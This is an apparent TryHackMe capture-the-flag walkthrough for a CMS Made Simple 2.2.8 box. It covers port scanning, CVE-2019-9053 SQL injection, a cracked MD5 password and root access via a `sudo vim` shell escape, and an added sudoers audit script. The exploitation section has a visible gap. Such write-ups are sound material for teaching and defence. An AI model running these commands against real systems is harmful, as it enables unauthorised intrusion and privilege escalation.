## https://sploitus.com/exploit?id=82BACCCF-4973-500F-8B25-5714A0310B69
# Simple CTF: TryHackMe Walkthrough
> **Platform:** TryHackMe | **Difficulty:** Easy | **CVE:** CVE-2019-9053
---
## 1. Reconnaissance
### Port Scan
```bash
nmap -p- --open <TARGET_IP>
```
**Results:**
| Port | Service |
|------|---------|
| 21 | FTP |
| 80 | HTTP |
| 2222 | SSH (non-default port) |
Confirm port 2222:
```bash
nmap -p 2222 -sS -sV -A <TARGET_IP>
```
Output confirmed OpenSSH 7.2p2 on port 2222.
---
## 2. Web Enumeration
Visiting port 80 gave a default Apache page with nothing useful in the source.
Ran Gobuster to find hidden directories:
```bash
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
```
**Found:** `/simple`, a CMS Made Simple installation running version **2.2.8**.
---
## 3. Vulnerability Research
Searched for known exploits:
```bash
searchsploit CMS Made Simple 2.2.8
```
Found **CVE-2019-9053**: an unauthenticated time-based SQL injection affecting CMS Made Simple /simple
**Extracted:**
| Field | Value |
|-------|-------|
| Salt | `1dac0d92e9fa6bb2` |
| Username | `mitch` |
| Email | *(found)* |
| Password hash | `0c01f4468bd75d7a84c7eb73846e8d96` |
Cracked the MD5 hash using CrackStation:
```
0c01f4468bd75d7a84c7eb73846e8d96 → secret
```
---
## 5. Initial Access
SSH is running on port 2222. Connected with the cracked credentials:
```bash
ssh mitch@<TARGET_IP> -p 2222
```
**User flag:**
```bash
ls
cat user.txt
```
---
## 6. Privilege Escalation
Checked sudo permissions:
```bash
sudo -l
```
Output showed `mitch` can run `vim` as root with no password.
Used GTFOBins vim privesc to read the root flag directly:
```bash
sudo vim /root/root.txt
```
Or to get a root shell:
```bash
sudo vim -c ':!/bin/bash'
```
**Root flag captured.**
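The root cause of this step is a sudoers rule that lets an unprivileged user run an editor as root. The following audit sketch is an added example, not part of the original walkthrough: it flags sudoers grants for binaries with known shell escapes. The binary list, the `/usr/bin/vim` path and the sample rules are constructed assumptions.

```python
import re

# Small constructed subset of binaries with documented shell escapes on GTFOBins.
SHELL_ESCAPE = {"vim", "vi", "nano", "less", "more", "man", "find", "awk",
                "perl", "python", "python3", "env", "bash", "sh"}
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?P<rest>.+)$")
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias", "@include")

def audit_sudoers(text):
    """Return (who, command, nopasswd, reason) for each risky command grant."""
    findings = []
    for line in text.replace("\\\n", " ").splitlines():  # join continuations
        line = line.split("#", 1)[0].strip()  # simplification: '#' always starts a comment
        m = RULE.match(line)
        if not m or line.startswith(SKIP) or m["who"] == "root":
            continue
        # Simplification: Runas specs are dropped, so every grant is treated as root-capable.
        rest = re.sub(r"\([^)]*\)", "", m["rest"])
        nopasswd = False
        for spec in rest.split(","):
            spec = spec.strip()
            # Tags such as NOPASSWD: are sticky and apply to the commands that follow.
            while (tag := re.match(r"([A-Z_]+):\s*", spec)):
                if tag[1] in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag[1] == "NOPASSWD"
                spec = spec[tag.end():]
            if not spec:
                continue
            cmd = spec.split()[0]
            name = cmd.rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "unrestricted ALL"
            elif name in SHELL_ESCAPE:
                reason = "shell escape via " + name
            else:
                continue
            findings.append((m["who"], cmd, nopasswd, reason))
    return findings

# Constructed sample; the mitch rule mirrors what `sudo -l` reported in this walkthrough.
SAMPLE = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
backup  ALL=(root) /opt/backup/run.sh, /usr/bin/less /var/log/syslog
deploy  ALL=(root) NOPASSWD: /opt/deploy/restart-web.sh
"""

if __name__ == "__main__":
    for who, cmd, nopasswd, reason in audit_sudoers(SAMPLE):
        print(f"{'HIGH' if nopasswd else 'MEDIUM'}: {who} -> {cmd} ({reason})")
```

Where a user only needs to edit a specific file as root, granting `sudoedit` on that path avoids running the editor itself with root privileges.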
---
## Summary
| Step | Detail |
|------|--------|
| Open ports | 21 (FTP), 80 (HTTP), 2222 (SSH) |
| Web discovery | `/simple`: CMS Made Simple 2.2.8 |
| CVE | CVE-2019-9053 (SQLi) |
| Credentials | `mitch` : `secret` |
| Privesc vector | `sudo vim` → GTFOBins |
---
## Tools Used
- `nmap`
- `gobuster`
- `searchsploit`
- Custom Python 3 exploit (CVE-2019-9053)
- CrackStation (MD5 lookup)
- `ssh`
- GTFOBins